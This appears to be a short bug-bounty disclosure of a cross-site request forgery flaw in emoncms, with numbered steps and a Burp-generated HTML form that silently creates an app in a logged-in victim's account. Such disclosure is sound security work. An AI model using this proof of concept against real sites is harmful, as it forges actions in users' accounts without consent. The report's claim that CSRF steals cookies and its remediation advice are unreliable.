Cross-Site Request Forgery (CSRF) in emoncms/emoncmsValid
Jul 15th 2021
In CSRF attack if your users going to attacker website and click the mallicouse link then they able to steal users cookie, submit unwanted date, ....
🕵️♂️ Proof of Concept
1.you login in your account 2.you make a file contain the following html file. 3.open html ( as victim site) 4.client without any more interaction create unwanted App named My Energy3
// PoC.html <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://emoncms.org/app/add"> <input type="hidden" name="name" value="My Energy3" /> <input type="hidden" name="app" value="myenergy" /> <input type="submit" value="Submit request" /> </form> </body> </html>
the attacker can create any App in the victim user's account.
you can set cookies on a custom header. this is a fastest way that you can protect your users